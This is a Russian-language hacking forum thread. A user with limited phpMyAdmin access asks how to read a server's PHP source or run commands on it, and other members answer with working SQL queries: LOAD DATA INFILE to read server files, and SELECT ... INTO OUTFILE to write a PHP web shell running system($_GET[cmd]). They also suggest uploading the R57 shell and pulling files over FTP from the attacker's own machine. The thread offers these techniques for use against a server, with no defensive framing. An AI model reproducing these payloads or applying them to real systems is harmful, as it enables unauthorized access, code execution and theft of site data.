MySQL...вопрос на засыпку...

Здравствуйте...

у меня такой вопорс к экспертам форума...
у меня есть phpMyAdmin...могу зайти в тестовом режиме...и могу выполнять SQL запросы...можно ли сформировать такой запрос чтобы, допустим качнуть файл из директории /home/docs/htdocs/index.php
в его чистом виде...т.е до обработки его сервером.

если да то помогите составить запрос...или как выполнить какую-нибдуь команду...

Заранее спасибо...надеюсь на фашу помощь...

С наилучшими пожеланиями!

 

заливай шелл и качай че хош!
R57shell

 

Читай статью про MySQL у меня в подписи.

Вкратце:

В phpmyadmin есть функция выполнения произвольного SQL кода. Тебе нужно знать лишь установочную дирректорию сайта. Дальше лазишь по phpmyadmin и находишь таблицу и смотришь колличество ее столбцов. и составляешь запрос по типу

UNION SELECT 1,2,3...кол-во столбцов и в последнем <?php system($_GET[c]);?> FROM имя_таблицы INTO OUTFILE тут_в_одинарных_ковычках_путь_к_файлу_куда_писать


НО! данная вещь сработает только если у твоего юзера есть права file_priv

 

nc.STRIEM
..наверно очень глупый вопрос,но все же как залить файл на сервак если у меня нету прав админа...у меня есть только строка выполняющая мои SQL запросы...очень плохо шарю в MySQL...
LoFFi
твой способ еще не порбывал не было времени, но всеравно спасибо...
заранее спасибо

 

после этого ты получаеш доступ к cmd! далее можеш поднять ftp на своем компе, это можно сделать при помощи RPC GUI после чего, использую команды cmd залить шел!

 

Прочитать файл можно и в MySQL.

Code:

CREATE TABLE `c` (`t` TEXT);
LOAD DATA INFILE '/home/.../admin.php' INTO TABLE `c`;
SELECT * FROM `c`;

А запись шелла делается проще -

Code:

SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/home/.../shell.php';

Безо всяких 1,2,3.. и FROM `table`

 

всем большое спасибо...
но мне сервер выдает постоянно ошибку...т.е базы он создает...но не выполняет нужный код

Code:

CREATE TABLE `c` (`t` TEXT);
LOAD DATA INFILE '/home/.../admin.php'
INTO TABLE `c`;  SELECT * FROM `c`;

т.е. первую и последнию строку он читает а вот второрую нет и от вечает мне

Code:

#1045 - Access denied for user ''@'localhost' (using password: NO)

получается он фильтрует данную шнягу,а еще вопрос можно через SQL-запрос поставить пасс на весь аккаунт БД,может он тогда успокоится, или проще забить?

 

>#1045 - Access denied for user ''@'localhost' (using password: NO)

Запрещена работа с файлами, так что ты ничего не прочитаеш и не сохраниш

>можно через SQL-запрос поставить пасс на весь аккаунт БД

Если у тебя есть доступ к БД mysql то можеш, если полный доступ, то можеш и права на запись поставить, хотя в этом сильно сомневаюсь.

 

ладно чуваки большое спасибо за помощь....обидно...
ну ничто долаем=))
...я думаю тема закрыта...
С наилучшими пожеланиями!

 

LoFFi, готов поспорить))

 

прав нет на чтение файлов

 

в консоли под рутом то выполнеться, а вот в инжекте нет.

 

Он сказал, что у него phpMyAdmin. Там выполнить это не вопрос.
Вот не под рутом:

Насчет того, что select не выполнится без from - кому курить мануал еще вопрос....

 

я смотрю у вас такой спор...
так что можно про это все забыть?
а и еще один вопросик...можно ли что-то вытащить из phpinfo.php файла?
заранее спасибо.
P.S.: Извиняюсь за может быть глупые вопросы...новичек в MySQL+php

 

phpinfo() выдает инфу о конфигурации сервера, Apache и PHP